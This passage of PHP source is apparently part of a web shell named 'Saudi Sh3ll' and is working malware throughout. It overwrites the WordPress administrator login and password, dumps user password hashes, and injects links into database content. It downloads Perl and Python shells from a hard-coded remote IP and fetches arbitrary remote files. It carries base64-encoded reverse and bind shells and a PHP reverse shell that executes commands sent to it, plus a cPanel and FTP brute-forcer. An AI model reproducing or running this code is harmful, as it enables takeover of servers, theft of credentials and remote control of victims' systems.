1997. $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
1998.  
1999. }
2000.  
2001. else if($ch == 'tr')
2002. {
2003. $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%' ");
2004. }
2005.  
2006.  
2007.  
2008.  
2009. $nu0 = @mysql_num_rows($sql4);
2010. if ($nu0 == 0){echo "No result"; exit;}
2011.  
2012. while ($r33o = @mysql_fetch_assoc($sql4))
2013. {
2014.  
2015.  
2016. $date = $r33o['date'];
2017. $title = $r33o['title'];
2018. $message = $r33o['message'];
2019. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
2020.  
2021. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
2022. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
2023. echo "</table></div>";
2024.  
2025.  
2026.  
2027.  
2028. }
2029.  
2030.  
2031.  
2032.  
2033.  
2034. }
2035. else
2036. {
2037.  
2038. echo'<form method="post">
2039. <br /><br />
2040. search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
2041. <option value="tr">ticket</option>
2042. <option value="trs">ticket replies</option>
2043. </select> <br /><br />
2044. <input type="submit" name="viw" value="search" />
2045.  
2046. </form>';
2047.  
2048. exit;
2049.  
2050.  
2051.  
2052.  
2053. }
2054. }
2055.  
2056.  
2057. else if ($op == 'css')
2058.  
2059. {
2060.  
2061. if (isset($_POST['viw']))
2062. {
2063. $index = $_POST['index'];
2064. $seh = $_POST['string'];
2065. $rs = search($seh);
2066. if(count($rs) == 0){echo 'No result';exit;}
2067. foreach ($rs as $info)
2068. {
2069.  
2070. $table = $info['table'];
2071. $column = $info['column'];
2072.  
2073. echo "table : $table<br /><br />
2074.  
2075. column : $column
2076. <form method=\"post\">
2077. <br /><br />
2078. <input type='submit' name='v' value=\"inject\" />
2079. <input type='hidden' name=\"index\" value=$index>
2080. <input type=\"hidden\" name=\"table\" value='$table'>
2081. <input type=\"hidden\" name=\"column\" value='$column' >
2082. <input type=\"hidden\" name=\"shearc\" value='$seh'>
2083. </form>
2084. ";
2085.  
2086. exit;
2087.  
2088.  
2089.  
2090.  
2091.  
2092.  
2093.  
2094. }
2095.  
2096.  
2097.  
2098.  
2099.  
2100.  
2101.  
2102. }
2103. else
2104. {
2105.  
2106. echo'<form method="post">
2107. <br /><br />
2108. search : <input type="text" name="string" />
2109. <br />
2110. Css url : <input type="text" name="index"><br /><br />
2111. <input type="submit" name="viw" value="search" />
2112.  
2113. </form>';
2114. exit;
2115.  
2116.  
2117.  
2118.  
2119.  
2120. }
2121.  
2122. if (isset($_POST['v']))
2123. {
2124.  
2125. $seh = $_POST['shearc'] ;
2126. $table = $_POST['table'];
2127. $column = $_POST['column'] ;
2128. $rlcss = $_POST['index'] ;
2129.  
2130. $data = "<head><link href=$rlcss rel=stylesheet></head>";
2131.  
2132. $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' WHERE `$column` LIKE '%$seh%'") or die(mysql_error());
2133. if($query){
2134. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been successfully</div> </center>";
2135. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2136. exit;
2137. }else{
2138. echo '<center><br /><div style=\"color: #003300; font-weight: bold\"> Injection erorr</div>';
2139.  
2140.  
2141. exit;
2142. }
2143.  
2144.  
2145. }
2146.  
2147.  
2148. }
2149.  
2150.  
2151. else if ($op == 'awp')
2152.  
2153. {
2154.  
2155.  
2156.  
2157. if (isset($_POST['viw']))
2158. {
2159.  
2160. $pass = $_POST['pass'];
2161. $user = $_POST['user'];
2162.  
2163.  
2164. $crypt = crypt($pass);
2165.  
2166. $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' WHERE ID = 1") or die;
2167. $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;
2168.  
2169. if ($query)
2170. {
2171. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated admin successfully </div> </center>";
2172. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2173. exit;
2174. }
2175. else if (!$query)
2176. {
2177. echo "<center><br /><div style=\"color: red; font-weight: bold\">Updated admin erorr </div> </center>";
2178. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2179. exit;
2180.  
2181. }
2182.  
2183.  
2184.  
2185.  
2186.  
2187.  
2188.  
2189. }
2190. else
2191. {
2192.  
2193. echo'<form method="post">
2194. <br /><br />
2195. user : <input type="text" name="user" /><br /><br />
2196. pass : <input type="text" name="pass" /><br /><br />
2197. <input type="submit" name="viw" value="update" />
2198.  
2199. </form>';
2200.  
2201.  
2202.  
2203.  
2204.  
2205. }
2206. }
2207.  
2208.  
2209. else if ($op == 'shwp')
2210. {
2211.  
2212.  
2213.  
2214.  
2215.  
2216. $sql = 'select * from `wp_users`';
2217. $query =@ mysql_query($sql);
2218.  
2219. if ($query)
2220. {
2221.  
2222. while ($row = mysql_fetch_assoc($query))
2223. {
2224.  
2225. echo "
2226. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
2227. <tr>
2228. <td>ID :</td>
2229. <td>user :</td>
2230. <td>pass :</td>
2231. <td>email :</td>
2232.  
2233. </tr>
2234.  
2235.  
2236. <tr>
2237. <td>".$row['ID']."</td>
2238. <td>".$row['user_login']."</td>
2239. <td>".$row['user_pass']."</td>
2240. <td>".$row['user_email']."</td>
2241. </tr>
2242.  
2243.  
2244.  
2245. </table>
2246.  
2247.  
2248. ";
2249.  
2250. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2251. exit;
2252.  
2253.  
2254.  
2255.  
2256.  
2257. }}
2258.  
2259. }
2260.  
2261.  
2262.  
2263. }
2264.  
2265. break;
2266.  
2267.  
2268.  
2269. /////////////////////////////////////////////// info ///////////////////////////////////
2270. case 'info':
2271.  
2272. $sws = 'al-swisre' ;
2273. if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
2274.  
2275. if(strlen($dir)>1 && $dir[1]==":")
2276. $os = "Windows";
2277. else $os = "Linux";
2278. $read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips");
2279. $r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ;
2280. $ipnet = @findit($read,"<td nowrap>IP-Network</td><td>&nbsp;</td><td nowrap>","</td>");
2281. $ipb = @findit($read,"<td nowrap>IP-Network-Block</td><td>&nbsp;</td><td nowrap>","</td>");
2282. $hostname = @findit($read,"Hostname:","<br>");
2283. $isp = @findit($r3ad,"ISP</td><td>","</td>");
2284.  
2285.  
2286.  
2287.  
2288.  
2289.  
2290. echo "<div class='info'><table cellpadding='0' align='center' width='60%' >
2291. <tr><td colspan='2'>Information Server</td><tr>
2292. <tr><td>Hostname</td><td>".$hostname."</td></tr>
2293. <tr><td>ISP</td><td>".$isp."</td></tr>
2294. <tr><td>IP-Network</td><td>".$ipnet."</td></tr>
2295. <tr><td>IP-Network-Block</td><td>".$ipb."</td></tr>
2296. <tr><td>Safe Mode</td><td>".(($safe_mode)?(" &nbsp;: <b><font color=red>ON</font></b>"):("<b><font color=green>OFF</font></b>"))."</td></tr>
2297. <tr><td>System</td><td>".$os."</td></tr>
2298. <tr><td>PHP Version </td><td>".phpversion()."</td></tr>
2299. <tr><td>Zend Version </td><td>".@zend_version()."</td></tr>
2300. <tr><td>Magic_Quotes </td><td>". magicQouts()."</td></tr>
2301. <tr><td>Curl </td><td>".Curl()."</td></tr>
2302. <tr><td>Register Globals </td><td>".RegisterGlobals()."</td></tr>
2303. <tr><td>Open Basedir </td><td>".openBaseDir()."</td></tr>
2304. <tr><td>Gzip </td><td>".Gzip()."</td></tr>
2305. <tr><td>Free Space </td><td>".HardSize(disk_free_space('/'))."</td></tr>
2306. <tr><td>Total Space </td><td>".HardSize(disk_total_space("/"))."</td></tr>
2307. <tr><td>MySQL</td><td>".MySQL2()."</td></tr>
2308. <tr><td>MsSQL</td><td>".MsSQL()." </td></tr>
2309. <tr><td>PostgreSQL</td><td>".PostgreSQL()."</td> </tr>
2310. <tr><td>Oracle</td><td>".Oracle()."</td></tr>";
2311.  
2312. exit;
2313.  
2314.  
2315.  
2316.  
2317.  
2318.  
2319.  
2320.  
2321.  
2322.  
2323.  
2324.  
2325.  
2326.  
2327.  
2328.  
2329.  
2330.  
2331.  
2332. break;
2333.  
2334.  
2335. ///////////////////////////////// bypass ///////////////////////
2336.  
2337. case 'byp':
2338.  
2339.  
2340. echo '<div class="cont3">
2341. [ <a href="?sws=byp"> bypass </a>]
2342.  
2343. [<a href="?sws=byp&op=shell&sh=perl">Make Shell Perl</a>]
2344.  
2345. [<a href="?sws=byp&op=shell&sh=py"> Make Shell Python </a>]
2346. [<a href="?sws=byp&op=g3t"> Get file </a>]
2347.  
2348. </div><br /><br />' ;
2349.  
2350. $op = $_GET['op'];
2351.  
2352. if(@$_GET['dir']){
2353. $dir = $_GET['dir'];
2354. if($dir != 'nullz') $dir = @cleandir($dir);
2355. }
2356.  
2357. if ($op == 'shell')
2358. {
2359.  
2360.  
2361. $sh = $_GET['sh'];
2362. ////////////////////////// perl or python //////////////////////
2363.  
2364. if (!isset($_POST['get']))
2365. {
2366.  
2367.  
2368.  
2369. echo "<form method='post'>
2370. Path shell : <input type='text' name='path' value='".$dir."/cgi-bin' size='30'/><br /><br />
2371. name shell : <input type='text' name='name' value='shell.sa' size='25' /><br /><br />
2372. htaccess :<br /><br /><textarea name='htx'>AddHandler cgi-script .sa</textarea>
2373. <br /><br />
2374. <input type='submit' name='get' value='Make' /></form>";
2375.  
2376. }else {
2377.  
2378.  
2379. $path = $_POST['path'];
2380. $name = $_POST['name'];
2381. $htac = $_POST['htx'];
2382.  
2383. if (isset($htac))
2384. {
2385.  
2386. $fop = @fopen("$path/.htaccess", 'w');
2387.  
2388. @fwrite($fop,$htac);
2389.  
2390. @fclose($fop);
2391.  
2392. }
2393.  
2394. $rpath = $path."/".$name;
2395.  
2396.  
2397. if ($sh == 'perl')
2398. {
2399. $url_shell = 'http://64.15.137.117/~google/cgi-bin/perl.zip'; /// perl
2400. $path = $dir."/".$d3r."/"."sa.pl";
2401.  
2402. }
2403. else if($sh == 'py')
2404.  
2405. {
2406.  
2407. $url_shell = 'http://64.15.137.117/~google/cgi-bin/python.zip'; /// python
2408. $path = $dir."/".$d3r."/"."sa.py";
2409.  
2410.  
2411. }
2412.  
2413. //// get shell///
2414.  
2415.  
2416. $fp = @fopen($rpath, 'w');
2417.  
2418. $ch = @curl_init($url_shell);
2419. @curl_setopt($ch, CURLOPT_FILE, $fp);
2420.  
2421. $data = @curl_exec($ch);
2422.  
2423. @curl_close($ch);
2424. @fclose($fp);
2425.  
2426.  
2427.  
2428. if (!is_file($rpath))
2429. {
2430.  
2431.  
2432.  
2433. $ch = @curl_init($url_shell);
2434. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2435.  
2436. $data = @curl_exec($ch);
2437.  
2438. @curl_close($ch);
2439.  
2440. @file_put_contents($rpath, $data);
2441.  
2442. }elseif (@is_file($rpath)) {
2443.  
2444. $ch =@chmod($rpath,0755);
2445.  
2446. echo "Sh3ll have been created<br /><br />
2447. $rpath";
2448.  
2449.  
2450.  
2451. }else {echo "error";}
2452.  
2453. }
2454. }
2455. ///////////////////// get file ////////////////////
2456. elseif ($op == 'g3t')
2457. {
2458.  
2459. if (!isset($_POST['get']))
2460. {
2461.  
2462.  
2463. echo 'Get file<br /><br /><br />
2464. <form method="post">
2465. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
2466. Url file : <input type="text" name="file" />&nbsp;&nbsp;
2467. to : <input type="text" name="path" value="'.$dir.'/file.php" /><br /><br />
2468. <input type="submit" name="get" value="Get" />
2469.  
2470. </form>' ;exit;
2471.  
2472.  
2473.  
2474.  
2475.  
2476.  
2477.  
2478. }
2479. else
2480. {
2481.  
2482. $url_shell = $_POST['file'];
2483. $path = $_POST['path'];
2484.  
2485.  
2486.  
2487. $fp = @fopen($path, 'w');
2488.  
2489. $ch = @curl_init($url_shell);
2490. @curl_setopt($ch, CURLOPT_FILE, $fp);
2491.  
2492. $data = @curl_exec($ch);
2493.  
2494. @curl_close($ch);
2495. @fclose($fp);
2496.  
2497.  
2498.  
2499. if (!is_file($path))
2500. {
2501.  
2502.  
2503.  
2504. $ch = @curl_init($url_shell);
2505. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2506.  
2507. $data = @curl_exec($ch);
2508.  
2509. @curl_close($ch);
2510.  
2511. @file_put_contents($path, $data);
2512.  
2513. }elseif (@is_file($path)) {
2514.  
2515.  
2516. echo "got the file successfully<br /><br />
2517. $path"; exit;
2518.  
2519.  
2520.  
2521. }else {echo "error";}
2522.  
2523.  
2524.  
2525. }
2526.  
2527.  
2528.  
2529.  
2530.  
2531. }else if(!isset($op)) {}
2532.  
2533.  
2534.  
2535.  
2536.  
2537.  
2538.  
2539. break;
2540.  
2541. /////////////////////////////////////////////////// Connect Back ////////////////////////////////////
2542.  
2543. case 'con':
2544.  
2545.  
2546.  
2547. if (!isset($_POST['con']))
2548. {
2549. echo "";
2550.  
2551. echo "
2552. <div class='conn'><table cellpadding='0' align='center'>
2553. <br />
2554. <form method=\"post\">
2555. <tr><td>
2556. <br />Back Connect :<br /> <br />
2557. Ip : <input type=\"text\" name=\"ip\" value='". $_SERVER['REMOTE_ADDR'] ."' />&nbsp;&nbsp;&nbsp;
2558. Port : <input type=\"text\" name=\"port\" />&nbsp;&nbsp;&nbsp;
2559. <select name=\"op\">
2560. <option value=\"php\">PHP</option>
2561. <option value=\"perl\">Perl</option>
2562. <option value=\"python\">Python</option>
2563. </select>&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"con\" value=\"Connect\" /><br /> <br /><br /></td></tr>
2564. <tr><td><br />Bind Connect :<br /><br />Port : <input type=\"text\" name=\"bind_port\" /> <select name=\"op\">
2565. <option value=\"perl\">Perl</option>
2566. <option value=\"python\">Python</option>
2567. </select>
2568. <input type=\"submit\" name=\"con\" value=\"Connect bind\" /> <br /><br /> <br /></td></tr>
2569.  
2570.  
2571. </form>";
2572.  
2573. exit;
2574.  
2575. }else
2576. {
2577.  
2578. if ($_POST['con'] == 'Connect') {
2579.  
2580.  
2581.  
2582. $ip = $_POST['ip'] ;
2583. $port = $_POST['port'] ;
2584. $op = $_POST['op'] ;
2585.  
2586. $bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2587. $bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
2588.  
2589. $back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2590. $back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i";
2591.  
2592. ////////////////////////// php ///////////////////////
2593. if ($op == 'php')
2594. {
2595.  
2596. $sockfd=fsockopen($ip , $port , $errno, $errstr );
2597.  
2598. if($errno != 0)
2599. {
2600. echo "$errno : $errstr";
2601. }
2602. else if (!$sockfd)
2603. {
2604. $result = "error connect!</p>";
2605. }
2606. else
2607. {
2608. fputs ($sockfd ,
2609. "
2610. /################################\
2611. # #
2612. # Saudi Sh3ll v1.0 #
2613. # #
2614. # by al-swisre #
2615. # #
2616. \################################/");
2617. $pwd = shell_exec("pwd");
2618. $sysinfo = shell_exec("uname -a");
2619. $id = shell_exec("id");
2620. $len = 1337;
2621. fputs($sockfd ,$sysinfo . "\n" );
2622. fputs($sockfd ,$pwd . "\n" );
2623. fputs($sockfd ,$id ."\n\n" );
2624. while(!feof($sockfd))
2625. {
2626. $cmdPrompt ="(Saudi sh3ll)[$]> ";
2627. fputs ($sockfd , $cmdPrompt );
2628. $command= fgets($sockfd, $len);
2629. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
2630. }
2631. fclose($sockfd);
2632. }
2633.  
2634. echo "End Connect";
2635. exit;
2636. }
2637.  
2638.  
2639.  
2640.  
2641. elseif ($op == 'perl')
2642. {
2643.  
2644.  
2645. op_sa("/tmp/sa.pl",$back_perl);
2646. $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");
2647. sleep(1);
2648. echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
2649. unlink("/tmp/sa.pl");
2650.  
2651.  
2652.  
2653. }
2654.  
2655.  
2656.  
2657. elseif ($op == 'python')
2658. {
2659.  
2660.  
2661. op_sa("/tmp/sa.py",$back_py);
2662. $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");
2663. sleep(1);
2664. echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
2665.  
2666.  
2667.  
2668.  
2669. }
2670.  
2671. }
2672. else if ($_POST['con'] == 'Connect bind'){
2673. /////////////////////// bind /////////////////////
2674.  
2675. if ($op == 'perl')
2676. {
2677.  
2678.  
2679.  
2680. $bind_port = $_POST['bind_port'];
2681.  
2682. op_sa("/tmp/sa.pl",$bind_perl);
2683. $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");
2684. sleep(1);
2685. echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
2686. unlink("/tmp/sa.pl");
2687.  
2688.  
2689.  
2690. }
2691.  
2692. else if ($op == 'python')
2693. {
2694.  
2695.  
2696. $bind_port = $_POST['bind_port'];
2697.  
2698. op_sa("/tmp/sa.py",$bind_py);
2699. $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");
2700. sleep(1);
2701. echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
2702. unlink("/tmp/sa.py");
2703.  
2704.  
2705.  
2706.  
2707.  
2708.  
2709. }
2710.  
2711.  
2712.  
2713.  
2714.  
2715.  
2716. }}
2717.  
2718.  
2719.  
2720.  
2721.  
2722. break;
2723.  
2724. ////////////////////////////////////////// BruteForce /////////////////////
2725.  
2726. case 'brt':
2727.  
2728. echo "<br /><br /><div class='cont3'><a href='$pg?sws=brt'>[ BruteForce ]</a></div><br />";
2729.  
2730.  
2731.  
2732. if (!isset($_POST['bru']))
2733. {
2734.  
2735. echo '<form method="post">
2736.  
2737. <textarea name="user" cols="30" rows="15">userlist</textarea>
2738. <textarea name="pass" cols="30" rows="15">passlist</textarea><br /><br />
2739. target : <input type="text" name="trg" value="localhost" />&nbsp;&nbsp;&nbsp;
2740. <select name="op">
2741. <option value="cpanel">cpanel</option>
2742. <option value="ftp">ftp</option>
2743. </select><br /> <br />
2744. <input type="submit" name="bru" value="brute" />
2745. </form>';
2746.  
2747. exit;
2748. }else
2749. {
2750.  
2751. $users = $_POST['user'];
2752. $pass = $_POST['pass'];
2753. $option = $_POST['op'];
2754. $connect_timeout=5;
2755. @ini_set('memory_limit', 1000000000000);
2756. $target = $_POST['trg'];
2757. @set_time_limit(0);
2758.  
2759. $userlist = explode ("\n" , $users );
2760. $passlist = explode ("\n" , $pass );
2761.  
2762. foreach ($userlist as $user) {
2763. $_user = trim($user);
2764. foreach ($passlist as $password ) {
2765. $_pass = trim($password);
2766. if($option == "ftp"){
2767. ftp_check($target,$_user,$_pass,$connect_timeout);
2768. }
2769. if ($option == "cpanel")
2770. {
2771. cpanel_check($target,$_user,$_pass,$connect_timeout);
2772. }
2773. }
2774. }
2775.  
2776.  
2777.  
2778.  
2779. }
2780.  
2781.  
2782.  
2783.  
2784.  
2785.  
2786. break;
2787.  
2788.  
2789. ///////////////////////////////////////////////////// about ///////////////////////////////////////////
2790. case 'ab':
2791.  
2792. echo '<div class="hedr"> <img src="http://im15.gulfup.com/2012-02-03/1328281037731.png" alt="Saudi Shell" > </div><br /> ';
2793. echo "<div class='ab'><table cellpadding='5' align='center'>";
2794. echo "<tr><td><b>Coded By :</b> al-swisre</td></tr>";
2795. echo "<tr><td><b>E-mail :</b> oy3@hotmail.com</td></tr>";
2796. echo "<tr><td><b>From :</b> Saudi Arabian</td></tr>";
